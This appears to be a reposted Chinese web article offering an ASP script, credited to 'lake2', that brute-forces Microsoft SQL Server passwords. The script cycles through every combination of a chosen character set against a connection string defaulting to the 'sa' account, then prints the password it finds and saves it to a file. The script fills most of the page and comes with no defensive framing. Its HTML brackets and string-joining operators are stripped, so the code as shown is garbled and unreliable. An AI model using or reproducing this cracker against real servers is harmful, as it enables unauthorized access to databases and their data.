主頁 > 知識(shí)庫 > 用ASP實(shí)現(xiàn)MSSQL用戶密碼破解

用ASP實(shí)現(xiàn)MSSQL用戶密碼破解

熱門標(biāo)簽:電銷機(jī)器人采購 友邦互聯(lián)電銷機(jī)器人違法嗎 滴滴地圖標(biāo)注上車點(diǎn) 地圖標(biāo)注還可以做嗎 外呼系統(tǒng)怎么話費(fèi) 無營業(yè)執(zhí)照地圖標(biāo)注教學(xué) 硅基電話機(jī)器人加盟 高質(zhì)量的電銷外呼系統(tǒng) 宿州防封外呼系統(tǒng)平臺(tái)
自己把以下代碼保存為ASP文件。當(dāng)然我還是一如既往的BS那些只改作者名字的家伙。 

復(fù)制代碼 代碼如下:


'============ ASP Port Scanner by lake2 =================== 
'http://lake2.0x54.org 
'Version: 0.1 
'For SpringBoard 
'========================================================== 
%> 
style type="text/css"> 
body,td,th {color: #0000FF;font-family: Verdana, Arial, Helvetica, sans-serif;} 
body {background-color: #ffffff;font-size:14px; } 
a:link {color: #0000FF;text-decoration: none;} 
a:visited {text-decoration: none;color: #0000FF;} 
a:hover {text-decoration: none;color: #FF0000;} 
a:active {text-decoration: none;color: #FF0000;} 
.buttom {color: #FFFFFF; border: 1px solid #084B8E; background-color: #719BC5} 
.TextBox {border: 1px solid #084B8E} 
.styleRed {color: #FF0000} 
/style> 
title>MSSQL Cracker for SpringBoard/title> 

Dim Password() 
If Request.Form("go") > "1" Then 
%> 
 div align="center">Welcome to a >http://lake2.0x54.org/a> /div> 
 form name="form1" method="post" action="" onSubmit="form1.Submit.disabled=true;"> 
  ConnStr:  
  input name="conn" type="text" class="TextBox" id="conn" value="Provider=SQLOLEDB.1;Data Source=127.0.0.1;User ID=sa;Password={PASS};" size="70"> 
  br> 
  Char: nbsp;nbsp;nbsp;nbsp; 
  input name="char" type="text" class="TextBox" id="char" value="0123456789" size="30"> 
nbsp;nbsp;nbsp;br> 
Length:nbsp;nbsp; 
input name="len" type="text" class="TextBox" id="len" value="3" size="4"> 
br>  
Path:nbsp;nbsp;nbsp;nbsp;nbsp; 
input name="path" type="text" class="TextBox" value="%=Server.MapPath("r.txt")%>" size="50"> 
input name="CFile" type="checkbox" class="TextBox" id="CFile" value="1" checked> 
Enablelbr> 
input name="go" type="hidden" id="go" value="1"> 
br> 
input name="Submit" type="submit" class="buttom" id="Submit" value=" Run "> 
/form> 

Else 
 timer1 = timer 
 Server.ScriptTimeout = 7776000 
 ConnStr = Request.Form("Conn") 
 Char = request.Form("char") 
 LenChar = Len(Char) 
 ReDim password(LenChar) 
 For i = 1 to LenChar 
  password(i) = Mid(Char, i, 1) 
 Next 
 length = CInt(request.Form("len")) 
 Call LAKE("") 
 response.Write "Done!br>Process "  tTime  " s" 
 If request.Form("CFile") > "" Then CreateResult("Done!"  vbcrlf  tTime) 
End If 

Sub LAKE(str) 
 If Len(str) >= length Then Exit Sub 
 For j = 1 to LenChar 
  pass = str  password(j) 
  If Len(pass) = length Then Call Crack(pass) 
  Call LAKE(pass) 
 Next 
End Sub 

Sub Crack(str) 
 On Error Resume Next 
 Set conn = Server.CreateObject("ADODB.connection") 
 conn.open Replace(ConnStr,"{PASS}",str) 
 If Err Then 
  If Err.Number > -2147217843 Then 
   response.Write(Err.Description  "BR>") 
   response.End() 
  End If 
 Else 
  response.Write("I Get it ! Password is font color=red>"  str  "/font>BR>Process "  tTime  " s") 
  If request.Form("CFile") > "" Then CreateResult(str  vbcrlf  tTime) 
  response.End() 
 End If 
End Sub 

Function tTime() 
 timer2 = timer 
 thetime=cstr(int(timer2-timer1)) 
 tTime = thetime 
End Function 

Sub CreateResult(t) 
 Set fs = CreateObject("Scripting.FileSystemObject")  
 Set outfile = fs.CreateTextFile(request.Form("path")) 
 outfile.WriteLine t 
 Set fs = Nothing 
End Sub 
%> 
 

標(biāo)簽:雅安 新余 儋州 廣元 七臺(tái)河 錫林郭勒盟 江門 宣城

巨人網(wǎng)絡(luò)通訊聲明:本文標(biāo)題《用ASP實(shí)現(xiàn)MSSQL用戶密碼破解》,本文關(guān)鍵詞  用,ASP,實(shí)現(xiàn),MSSQL,用戶,密碼破解,;如發(fā)現(xiàn)本文內(nèi)容存在版權(quán)問題,煩請(qǐng)?zhí)峁┫嚓P(guān)信息告之我們,我們將及時(shí)溝通與處理。本站內(nèi)容系統(tǒng)采集于網(wǎng)絡(luò),涉及言論、版權(quán)與本站無關(guān)。
  • 相關(guān)文章
  • 下面列出與本文章《用ASP實(shí)現(xiàn)MSSQL用戶密碼破解》相關(guān)的同類信息!
  • 本頁收集關(guān)于用ASP實(shí)現(xiàn)MSSQL用戶密碼破解的相關(guān)信息資訊供網(wǎng)民參考!
  • 推薦文章